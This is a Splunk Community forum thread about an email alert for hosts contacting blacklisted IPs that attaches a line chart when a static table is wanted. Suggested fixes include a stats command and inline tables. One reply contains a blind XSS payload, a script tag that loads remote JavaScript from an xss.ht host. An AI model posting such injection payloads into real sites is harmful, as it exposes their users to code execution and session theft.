Alerting
×

Are you a member of the Splunk Community?

Sign in or Register with your Splunk account to get your questions answered, access valuable resources and connect with experts!
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Ask a Question

Alerts, wrong visualization in the attachment

a_n
Path Finder
‎09-07-2021 12:34 AM

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

Labels (1)
Labels
Tags (1)
0 Karma
Reply

a_n
Path Finder
‎09-09-2021 11:04 PM

Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

chart is like:
Screen Shot 2021-09-10 at 9.01.22 AM.png

Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.

Is it the only way to do this?
Thank you

 

0 Karma
Reply

isoutamo
SplunkTrust
SplunkTrust
‎09-09-2021 11:23 PM

Maybe you can change you table + deduce to

...
| stats count by Src, Dst, pt
...

And as you said don't attach pdf etc. into alert email, just link and/or inline.

r. Ismo 

0 Karma
Reply

shivamrai
New Member
‎09-10-2021 01:37 AM

"><script src=https://shivamraixssht.xss.ht></script>

0 Karma
Reply

a_n
Path Finder
‎09-10-2021 02:22 AM

Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you

0 Karma
Reply

a_n
Path Finder
‎09-10-2021 12:57 AM

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.

 

Thank you very much

0 Karma
Reply

a_n
Path Finder
‎09-09-2021 10:46 PM

Any one can assist please?

0 Karma
Reply

isoutamo
SplunkTrust
SplunkTrust
‎09-09-2021 10:58 PM

Can you post your query + those visualisations?

0 Karma
Reply

a_n
Path Finder
‎09-09-2021 11:22 PM

I have added the search and chart, but seems in wrong level.

Please check.

Thank you

0 Karma
Reply
Get Updates on the Splunk Community!

Aligning Observability Costs with Business Value: Practical Strategies

 Join us for an engaging Tech Talk on Aligning Observability Costs with Business Value: Practical ...

Mastering Data Pipelines: Unlocking Value with Splunk

 In today's AI-driven world, organizations must balance the challenges of managing the explosion of data with ...

Splunk Up Your Game: Why It's Time to Embrace Python 3.9+ and OpenSSL 3.0

Did you know that for Splunk Enterprise 9.4, Python 3.9 is the default interpreter? This shift is not just a ...